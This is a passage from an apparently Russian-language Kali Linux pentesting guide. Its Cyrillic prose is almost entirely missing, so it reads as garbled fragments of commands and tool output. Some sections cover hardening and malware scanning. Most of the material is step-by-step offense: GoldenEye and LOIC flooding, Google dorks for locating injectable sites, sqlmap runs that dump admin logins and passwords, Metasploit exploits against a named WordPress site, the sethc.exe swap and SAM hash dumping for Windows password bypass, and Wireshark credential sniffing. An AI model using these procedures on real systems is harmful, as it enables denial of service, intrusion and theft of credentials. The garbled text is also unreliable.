350 .
1 ./goldeneye.py http://192.168.1.37/info.php
121
, - ,
, .
, ( -
, ).
GoldenEye
:
1 cat /var/log/apache2/access.log | grep -E '192.168.1.55'
grep -E '192.168.1.55', ,
.
:
1
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?vySSDx=tG1rmfX4HbYXBm&CKV
2
Safari/535.17"
3
192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET /info.php?dC1FyXpw=hB6Oh&rjcf74A=YV
4
AppleWebKit/536.12 (KHTML, like Gecko) Chrome/10.0.623.89 Safari/536.26"
5
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?0Nk7p=kSf&1eVF8PNy=UpDtxpDmJ
6
Firefox/12.0"
7
192.168.1.55 - - [18/Jun/2015:17:06:51
8
"http://www.google.com/gCqMk2Q05?DxQe=67gW4HUd3iTKCu2qWSJ&ngWHMmS1=5XyoGh6q2
9
(Linux x86_64; X11) Gecko/20010905 Firefox/17.0"
10
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?jA5Kw=fwtSMfaPQ8XtCaK&Y0fBbD
11
122
, GET ,
, Bing, Baidu, Yandex
.
, - ?
, URL, Referrer
200 OK. ? .
, ,
, IP ( IP
?) (Firefox, Chrome, MSIE, Safari . .),
(Mac, Linux, Windows ..) . ,
URL , -
,
123
(, Apache worker/socket). - X
IP /
,
(HTTP 503 ). ,
proxy/VPN .
IP :
root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/ -
w 10 -s 10 -m random
:
-w = 10
-s = 10
-m = , GET POST
DoS!
Google Analytics GoldenEye
, , -
. , Google Analytics
( IP,
Google , ).
:
Google, . .
.
Google , -
Google.
.
/ GoldenEye
, Apache:
1. IP ( 300 IP Apache)
2. IP
3. KeepAlive Connection Timeout ( 300)
4. , .
, .
5. Web application Firewall (WAF).
6.
.
7. NGINX Node.js .
GoldenEye ( ) HTTP Flooder .
, NoCache KeepAlive GoldenEye .
,
, .
, -
( ), - -
, GET POST .
. WAF .
. . .
, , Kali Linux, .
Ubuntu, Linux Mint ( Debian), :
1 sudo apt-get install mono-complete
, ,
1 cd ./Desktop
loic, :
1 mkdir loic
,
1 cd ./loic
:
1 wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh
126
:
1 chmod 777 loic.sh
:
1 ./loic.sh install
- ,
loic. , :
1 ./loic.sh update
, LOIC. :
1 ./loic.sh run
127
, , Windows ( )?
Linux !
- Low Orbit Ion Cannon (LOIC)
LOIC . IRC .
. URL IP .
. Lock on. : TCP, UDP HTTP. HTTP.
. , IMMA
CHARGIN MAH LAZER. LOIC . Stop Flooding
:
128
.. , Windows
Linux. , IRC ,
.
.
129
5. -
Windows, "
sqlmap Windows". ,
" : SQL-".
, , Kali Linux,
, ? ,
- . , , ,
. ()
,
-. ,
PHP, , !
-
.
SQLMAP,
SQL-.
, , , ,
.
SQL- , ,
, ( ) SQL
(, ).
SQL- , ,
,
SQL ,
. SQL-
-, SQL .
SQLMAP SQL-
Kali Linux , , - ( , )
Kali Linux.
: Kali Linux,
Kali Linux:
.
, WebWare.biz Kali Linux.
SQLMAP
sqlmap ,
SQL-
. ,
,
.
MySQL, Oracle, PostgreSQL,
Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase SAP MaxDB.
SQL-: ,
, , UNION ,
.
130
SQL-
, IP , .
, , , , ,
.
.
, , ,
.
.
,
. , ,
, ,
name pass ( ).
()
, MySQL, PostgreSQL
Microsoft SQL Server.
, ,
MySQL, PostgreSQL Microsoft SQL Server.
(out-of-band) TCP
.
, Meterpreter
(VNC) .
Metasploit
Meterpreter.
, ,
- , , .
- , . ,
.
, :
1: -
, , , .
, Google Dorks , . ,
, , .
- , , .
1.: Google Dorks SQLMAP SQL -
. .
, .
, .
Google Dork string Column Google Dork string Google Dork string
1 Column 2 Column 3
inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=
inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=
inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=
inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=
inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=
inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=
inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=
inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=
inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=
131
inurl:galeri_info.php?l= inurl:website.php?id=
1.: , - SQLMAP
SQL-
, , .
, SQLMAP SQL-.
, , ,
.
, inurl:rubrika.php?idr=, -
:
1 http://www.sqldummywebsite.name/rubrika.php?id=28
' URL. ( "
, ' ).
:
1 http://www.sqldummywebsite.name/rubrika.php?id=28'
SQL , SQLMAP SQL-.
,
.
.
SQLi
Microsoft SQL Server
1 Server Error in / Application. Unclosed quotation mark before the character string attack;
2 Description: An unhanded exception occurred during the execution of the current web request. Plea
3 Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the chara
MySQL
1 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/ww
2 Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL se
Oracle
1 java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.D
2 Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated
PostgreSQL Errors
1 Query failed: ERROR: unterminated quoted string at or near
2: SQLMAP SQL-
, -
SQLMAP SQL-.
( ). SQLMAP,
, .
133
-.
1 sqlmap -u http://www.sqldummywebsite.name/rubrika.php?id=31 --dbs
:
sqlmap = sqlmap
-u = (. http://www.sqldummywebsite.name/rubrika.php?id=31)
dbs =
:
1 web server operating system: Linux Gentoo
2 web application technology: Nginx, PHP 5.3.29
3 back-end DBMS: MySQL 5.0.11
4 [18:47:01] [INFO] resumed: information_schema
5 [18:47:01] [INFO] resumed: laminat
, , ,
information_schema MYSQL.
, laminat.
3. , SQLMAP SQL-
- .
:
1 sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat --tables
, 18 .
1 [18:52:25] [INFO] fetching tables for database: 'laminat'
2 [18:52:25] [INFO] fetching number of tables for database 'laminat'
134
! , . ,
:
heslo
stupen
login .
.. .
5: SQLMAP SQL-
SQLMAP SQL- ! :
1 sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --dump
. , , ,
, , :
1 sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C login --dump
.
, .
.
6: SQLMAP SQL-
, . , .
1 sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C heslo --dump
!! .
, . - . -,
- .
. . ,
.
, - , sqlmap .
137
. -,
.
, ,
-.
.. , - ,
. , , , , ,
, , ,
, , !
, . WebWare.biz
, ,
. . , WebWare.biz, ,
: ,
. , :
, -
.
(
, ). ,
.
Kali Linux, , ,
Kali Linux ( , ).
WordPress .
. WordPress
, ,
(!). WordPress
.
WordPress Security Scanner
WordPress. :
;
;
;
robots.txt;
WordPress, , .
, . ( ):
1 wpscan --update
( ), .
WordPress Security Scanner
update : .
url -u < url> : URL / WordPress .
force -f : WPScan , WordPress
( , WordPress, ).
enumerate -e [()] : (
).
:
u : id 1 10
u[10-20] : id 10 20 ( [] )
p :
vp : , ,
139
ap : ( )
tt : timthumbs
t :
vt : , ,
at : ( ).
, -e p,vt
. ,
"vt,tt,u,vp".
, , .
:
1 wpscan -h
:
1 wpscan -u webware.biz -e p,vt
.. wpscan, -u -
. -e ( ).
,
( ).
, WordPress,
, :
140
WordPress .
:
/proxy/admin.php, Glype;
, . . ,
wp-content/plugins/wordpress-backup-to-dropbox/. ,
, ,
. , VPS ( ,
).
Plecost
WordPress .
, ( , ).
,
, . ,
. . , .
-i, .
, . Kali Linux
//usr/share/plecost/wp_plugin_list.txt ( ).
141
plecost -i
//usr/share/plecost/wp_plugin_list.txt, . :
1 plecost -i //usr/share/plecost/wp_plugin_list.txt webware.biz
( ):
, , Metasploit Framework
searchsploit, The Exploit Database .
: WPScan Vulnerability Database ( WordPress)
Packet Storm ( ).
( WordPress)
1. WordPress (
-).
2. , ,
WordPress, (
-) , , . ..
- , , .
3. WordPress:
,
. .
WordPress. ,
, , "" . : )
, ; ) .
142
4. ( 30
, ). -
( ).
, .
5. ! Kali Linux ! ,
. , Kali Linux,
Linux. , .
,
, ,
. ..
, - , , ,
. , ( )
,
. , ,
, . ..,
, (
), ""
, , .
W3af (Web Application Attack and Audit Framework) open-source -
.
, - .
, .
-
XSS, CSRF Sqli w3af .
W3af
W3af :
1 w3af_console
:
1 w3af>>> help
:
1 |-----------------------------------------------------------------------------|
2 | start | . |
3 | plugins | . |
4 | exploit | . |
5 | profiles | . |
6 | cleanup | . |
7 |-----------------------------------------------------------------------------|
8 | help | . : help [] , |
9 | | "" |
10 | version | w3af. |
11 | keys | . |
12 |-----------------------------------------------------------------------------|
13 | http-settings | HTTP . |
14 | misc-settings | w3af. |
15 | target | URL. |
16 |-----------------------------------------------------------------------------|
17 | back | . |
143
18 | exit | w3af. |
19 |-----------------------------------------------------------------------------|
20 | kb | , . |
21 |-----------------------------------------------------------------------------|
w3af .
,
"back".
"view"
.
"target". URL .
:
1 w3af>>> target
2 w3af/config:target>>> help
:
1 |-----------------------------------------------------------------------------|
2 | view | . |
3 | set | . |
4 | save | . |
5 |-----------------------------------------------------------------------------|
6 | back | . |
7 | exit | w3af. |
8 |-----------------------------------------------------------------------------|
URL :
1 w3af/config:target>>> set target http://localhost
2 w3af/config:target>>> view
.
1 w3af/config:target>>> back
2 w3af>>> plugins
3 w3af/plugins>>> help
1 |---------------------------------------------------------------------------------------------------|
2 | list | List available plugins. |
3 |---------------------------------------------------------------------------------------------------|
4 | back | Go to the previous menu. |
5 | exit | Exit w3af. |
6 |---------------------------------------------------------------------------------------------------|
7 | grep | View, configure and enable grep plugins |
8 | audit | View, configure and enable audit plugins |
9 | evasion | View, configure and enable evasion plugins |
10 | crawl | View, configure and enable crawl plugins |
11 | auth | View, configure and enable auth plugins |
12 | mangle | View, configure and enable mangle plugins |
13 | output | View, configure and enable output plugins |
14 | bruteforce | View, configure and enable bruteforce plugins |
15 | infrastructure | View, configure and enable infrastructure plugins |
16 |---------------------------------------------------------------------------------------------------|
-
. Audit,crawl, infrastructure output.
audit, ,
xss, csrf, sql ldap ..
.
:
1 w3af/plugins>>> audit xss,csrf,sqli
144
:
1 w3af/plugins>>> audit all
- .
html.
crawl output.
1 w3af/plugins>>> crawl web_spider,pykto
2 w3af/plugins>>> infrastructure hmap
3 w3af/plugins>>> output console,html_file
:
Web_spider web-.
.
Pykto nikto, python.
nikto (scan_database) .
Hmap -, ,
.
"Server".
hmap Dustin`a Lee.
Console .
Html_file HTML-.
:
1 w3af/plugins>>> back
2 w3af>>> start
, .
:
w3af>>> start
1 Auto-enabling plugin: discovery.allowedMethods
2 Auto-enabling plugin: discovery.error404page
3 Auto-enabling plugin: discovery.serverHeader
4 The Server header for this HTTP server is: Apache/2.2.3 (Ubuntu) PHP/5.2.1
5 Hmap plugin is starting. Fingerprinting may take a while.
6 The most accurate fingerprint for this HTTP server is: Apache/2.0.55 (Ubuntu) PHP/5.1.2
7 pykto plugin is using "Apache/2.0.55 (Ubuntu) PHP/5.1.2" as the remote server type. This informa
8 pykto plugin found a vulnerability at URL: http://localhost/icons/ . Vulnerability description: Dire
9 the /icons directory should be removed. The vulnerability was found in the request with id 128.
10 pykto plugin found a vulnerability at URL: http://localhost/doc/ . Vulnerability description: The /d
11 pykto plugin found a vulnerability at URL: http://localhost/\> . Vulnerability description: The IBM
12was found in the request with id 3385.
13 New URL found by discovery: http://localhost/
14 New URL found by discovery: http://localhost/test2.html
15 New URL found by discovery: http://localhost/xst2.html
16 New URL found by discovery: http://localhost/xst.html
New URL found by discovery: http://localhost/test.html
, results.html:
145
5 :
-c .
-v , .
, .
searchsploit ( ), :
147
1 searchsploit phpmyadmin
1 searchsploit wordpress
148
, . ( ),
, . .
: : .c, .pl, .txt, .sh,
.php, .rb, .py, .zip, .java, .asm, .htm .
.txt
. , , : ,
, , . .
149
.rb Ruby, :
ruby + + .
:
1 ruby /usr/share/exploitdb/platforms/php/webapps/28126.rb
150
.rb Metasploit.
-,
1 require 'msf/core'
Metasploit
.c .
.php . Ruby
, PHP
( ,
).
,
1 php /usr/share/exploitdb/platforms/php/webapps/35413.php webware.biz Alexey 50
151
- ,
. :
1 msf > db_rebuild_cache
search + + . :
1 msf > search wordpress
153
, , .
: ,
, ( ),
.
, WordPress , . .
.
, , :
exploit/unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent WordPress Download
Manager (download-manager) Unauthenticated File Upload
exploit/unix/webapp/wp_downloadmanager_upload
use .
1 msf > use exploit/unix/webapp/wp_downloadmanager_upload
, :
1 show options
( ).
154
, .
set
:
1 set RHOST webware.biz
.
TARGETURI. , , phpMyAdmin,
phpmyadmin ,
.
1 exploit
, .
, , ,
, . . nmap.
:
1 msf > nmap 10.0.2.2
155
, , , ,
.
" Kali Linux 1.0.9a. 2.
".
, :
- (phpMyAdmin, WordPress, Drupal . .)
.
. , -.
, .
- , : )
, , ; )
, ,
.
157
6.
OpenVAS 8.0
.
.
Kali Linux OpenVAS 8.0
Kali Linux.
, ,
OpenVAS 8.0 .
Kali
, , Kali
OpenVAS. , openvas-setup OpenVAS,
, admin .
,
.
1 root@kali:~# apt-get update
2 root@kali:~# apt-get dist-upgrade
3
4 root@kali:~# apt-get install openvas
5 root@kali:~# openvas-setup
6 /var/lib/openvas/private/CA created
7 /var/lib/openvas/CA created
8
9 [i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.
10 [i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed
11 ...
12 sent 1143 bytes received 681741238 bytes 1736923.26 bytes/sec
13 total size is 681654050 speedup is 1.00
14 [i] Initializing scap database
15 [i] Updating CPEs
16 [i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2002.xml
17 [i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2003.xml
18 ...
158
- OpenVAS
159
https://127.0.0.1:9392,
SSL admin.
. (
, ),
. :
1 openvasmd --get-users
:
1 openvasmd --user=admin --new-password=1
, admin, , ,
. , , .
1 openvasmd --create-user=mial
.
1 openvas-start
160
! OpenVAS IP ,
. !
(rootkit) ,
, .
, ,
, , -
.
Linux ,
.
Rootkit Hunter (rkhunter). , Linux
rkhunter.
rkhunter Linux
rkhunter Debian, Ubuntu Linux Mint:
1 $ sudo apt-get install rkhunter
rkhunter Fedora:
1 $ sudo yum install rkhunter
rkhunter CentOS RHEL Repoforge
, yum.
1 $ sudo yum install rkhunter
Linux
.
1 $ sudo rkhunter -c
rkhunter , , :
SHA-1
, .
, .
, , -
.
,
xinetd.
.
.
.
.
.
Rootkit Hunter .
161
, rkhunter /var/log/rkhunter.log.
.
1 $ sudo grep Warning /var/log/rkhunter.log
162
Linux
Linux 6 ? .
Shellshock, Heartbleed, Poodle, Ghost , , . -
Linux,
. ? openVPN ?
SSH ? Linux.
, , ,
. Lynis. Lynis
.
, .
Lynis.
Linux?
Lynis
.
.
. Lynis
,
. ,
.
Lynis:
163
1.
2.
3.
Lynis (, yum apt-get),
, Lynis.
.
Lynis
, Lynis
.
. , ,
, .
Lynis,
.
Red Hat: $ sudo yum install lynis
Debian: $ sudo apt-get install lynis
, , . !
?
Lynis
, .
( /usr/local/lynis)
Lynis ( ).
1 mial@mial-VirtualBox ~ $ sudo -s
2 [sudo] password for mial:
3 mial-VirtualBox ~ # mkdir /usr/local/lynis
4 mial-VirtualBox ~ # cd /usr/local/lynis/
5 mial-VirtualBox lynis #
Lynis
() Lynis ( lynis-
1.6.4.tar.gz). wget ( ).
Mac OS curl, BSD
fetch.
1 mial-VirtualBox lynis # wget https://cisofy.com/files/lynis-1.6.4.tar.gz
164
Lynis
Lynis ,
.
1 mial-VirtualBox lynis # ./lynis --help
2
3 [ Lynis 1.6.4 ]
4
5 ###############################################################################
6 Lynis comes with ABSOLUTELY NO WARRANTY. This is free software, and you are
7 welcome to redistribute it under the terms of the GNU General Public License.
8 See the LICENSE file for details about using this software.
9
10 Copyright 2007-2014 - CISOfy & Michael Boelen, http://cisofy.com
11 Enterprise support and plugins available via CISOfy - http://cisofy.com
12 ###############################################################################
13
14 [+] Initializing program
15 ------------------------------------
16 Scan options:
17 --auditor "<name>" : Auditor name
18 --check-all (-c) : Check system
19 --no-log : Don't create a log file
20 --pentest : Non-privileged scan (useful for pentest)
21 --profile <profile> : Scan the system with the given profile file
22 --quick (-Q) : Quick mode, don't wait for user input
23 --tests "<tests>" : Run only tests defined by <tests>
24 --tests-category "<category>" : Run only tests defined by <category>
25
26 Layout options:
27 --no-colors : Don't use colors in output
28 --quiet (-q) : No output, except warnings
29 --reverse-colors : Optimize color display for light backgrounds
30
31 Misc options:
32 --check-update : Check for updates
33 --debug : Debug logging to screen
34 --view-manpage (--man) : View man page
35 --version (-V) : Display version number and quit
36
37 Enterprise options:
38 --plugin-dir "<path>" : Define path of available plugins
39 --upload : Upload data to central node
40
41 See man page and documentation for all available options.
Lynis
Linux Mint Lynis.
1 ./lynis --auditor "MiAl" -c -Q
166
- PHP:
[+] Software: PHP
Checking PHP [ NOT FOUND ]
Checking PHP disabled functions [ NONE ]
include/tests_php php.ini.
:
1 mial-VirtualBox lynis # ./lynis -c
2 ()
3 mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q
4 ()
5 mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q -q
6 ()
7 mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -q -Q --pentest
8 ( )
Lynis
Lynis /var/log/lynis.log. Lynis
Shellshock . , ,
.
- . .
Lynis .
/var/log/lynis.log .
, Lynis ( ):
, Lynis .
.
GPLv3 .
.
167
, .
-
.
, :
HTML ( ).
.
CVE HTML .
.
SQLi .
/.
, config/include .
, ,
. , Lynis .
, Linux, Windows Unix .
,
. Lynis ,
, ( )
.
.
: Lynis
: http://cisofy.com/lynis/
:
: GPLv3
http://cisofy.com/downloads/
, , ,
, .
, , Linux, ,
RHEL, CentOS, Fedora, Debian, Ubuntu, Mint.
, Apache
DOS , mod_security mod_evasive.
LMD (Linux Malware Detect).
Malware?
Malware () , ,
. (malware)
, , , ,
,
.
Linux Malware Detect (LMD)?
Linux Malware Detect (LMD) ,
Unix/Linux ,
GNU GPLv2. ,
. , , ,
, , ,
// .
168
1 ./install.sh
1 sudo ./install.sh
, -.
:
3: LMD
,
, , . ,
- , .
email_alert : , 1.
email_subj : .
email_addr :
.
169
quar_hits : , 1.
quar_clean : , 1.
quar_susp : ,
, .
quar_susp_minuid : userid .
/usr/local/maldetect/conf.maldet .
1 vi /usr/local/maldetect/conf.maldet
.
1 # [ EMAIL ALERTS ]
2 ##
3 # The default email alert toggle
4 # [0 = disabled, 1 = enabled]
5 email_alert=1
6
7 # The subject line for email alerts
8 email_subj=" $(hostname)"
9
10 # The destination addresses for email alerts
11 # [ values are comma (,) spaced ]
12 email_addr="alexey@webware.biz"
13
14 # Ignore e-mail alerts for reports in which all hits have been cleaned.
15 # This is ideal on very busy servers where cleaned hits can drown out
16 # other more actionable reports.
17 email_ignore_clean=0
18
19 ##
20 # [ QUARANTINE OPTIONS ]
21 ##
22 # The default quarantine action for malware hits
23 # [0 = alert only, 1 = move to quarantine & alert]
24 quar_hits=1
25
26 # Try to clean string based malware injections
27 # [NOTE: quar_hits=1 required]
28 # [0 = disabled, 1 = clean]
29 quar_clean=1
30
31 # The default suspend action for users wih hits
32 # Cpanel suspend or set shell /bin/false on non-Cpanel
33 # [NOTE: quar_hits=1 required]
34 # [0 = disabled, 1 = suspend account]
35 quar_susp=0
36 # minimum userid that can be suspended
37 quar_susp_minuid=500
4:
,
.
1 maldet --scan-all /home
170
, ,
, ,
.
1 # maldet --quarantine SCANID
2
3 # maldet --clean SCANID
5:
LMD /etc/cron.daily/maldet,
, , . .
. ,
.
1 vi /etc/cron.daily/maldet
, ,
.
Windows?
Windows ( ),
, , .
Windows
.
ElcomSoft System Recovery,
( ,
, ,
- 1, 1111, 123, admin, password, ).
Kali Linux.
, Kali Linux 1) Windows, 2)
,
.
, . 99.99%
, - .
, Live- ( Linux
). C:\Windows\System32\ cmd.exe sethc.exe
osk.exe. , sethc.exe ( osk.exe), cmd.exe
.
sethc.exe, Windows,
, SHIFT, osk.exe,
. (cmd.exe)
:
net user _ *
.. admin, :
net user admin *
.
.
Active Directoryis ,
LDAP. SAM
C:\<systemroot>\System32\config\ (C:\<systemroot>\sys32\config\).
SAM , LM NTLM,
.
: .
,
SAM Windows . SAM
( ),
- . SAM
C:\. Linux, Kali,
Live-.
SAM C:\<systemroot>\repair.
SAM .
, , , ,
. expand. Expand
[FILE] [DESTINATION]. SAM
uncompressedSAM.
C:\> expand SAM uncompressedSAM
, Microsoft Windows 2000
SYSKEY. SYSKEY
SAM 128- ,
Windows.
Windows SYSKEY (
) :
1. (, Kali).
2. SAM SYSTEM
(C:\<systemroot>\System32\config\ (C:\<systemroot>\sys32\config\)).
3. SYSTEM bkreg bkhive.
4. .
5. , John the Ripper.
. Windows
MAC(, ), .
,
( ) .
Windows
Windows- SAM SYSKEY.
Windows ,
, Microsoft Windows
.
fdisk -l .
Windows . fdisk NTFS ,
:
Device Boot Start End Blocks Id System
/dev/hdb1* 1 2432 19535008+ 86 NTFS
/dev/hdb2 2433 2554 979965 82 Linux swap/Solaris
/dev/hdb3 2555 6202 29302560 83 Linux
mkdir /mnt/windows.
Windows
:
mount -t <WindowsType> <Windows partition> /mnt/windows
172
, Windows , SAM
SYSTEM :
cp SAM SYSTEM /pentest/passwords/AttackDirectory
SAM. PwDumpand Cain, Abel samdump
.
, SAM.
SAM. ,
SAM .
bkreg bkhiveare ,
, :
Windows:
-, .
-. ,
. ( BIOS
,
).
,
VeraCrypt TrueCrypt (
, ).
Windows ,
, , (
) . . .
173
7. .
- WireShark ( )
, , -
ENTER, . , .
-?? (, ) -
HTTP (PlainText),
( ) . ,
- -, HTTP
. ,
(BGP ,
).
, , ,
HTTP. ,
, , ,
.
, -.
. VirtualBox/VMWare/ .
: ,
.
1. Wireshark
Kali Linux Wireshark
> Kali Linux > Top 10 Security Tools > Wireshark
Wireshark Capture > Interface
, , eth0,
wlan0.
174
, Start Wireshark .
, Capture > Start
2. POST
, Wireshark .
-, .
, Wireshark. ,
. , ,
,
.
Wireshark . ,
POST.
POST?
,
POST.
POST,
:
175
1 http.request.method == "POST"
. 1 POST.
3: POST
Follow TCP Steam
, - :
176
log=Dimon&pwd=justfortest?
..
log=Dimon ( : Dimon)
pwd=justfortest (: justfortest)
, WebWare.biz .
WireShark
1. . ,
Wi-Fi , .
2. , , ,
. ( ),
, , .
, .
.
, ,
, .
3. VPN,
.
177
4. SSL-. :
. : , , ,
- SSL-, , .
: ( , , , -
, - . .) . !
, SSL-.
( , /
/ ), SSL-
( , ). ,
, , 400 .
, SSL-.
- ,
SSL-, .
, , .
178
( WebWare.biz),
- ,
: http://webware.biz/?page_id=27
http://webware.biz/
http://webware.biz/?feed=rss2 https://vk.com/webware_biz
http://webware.biz/?p=3920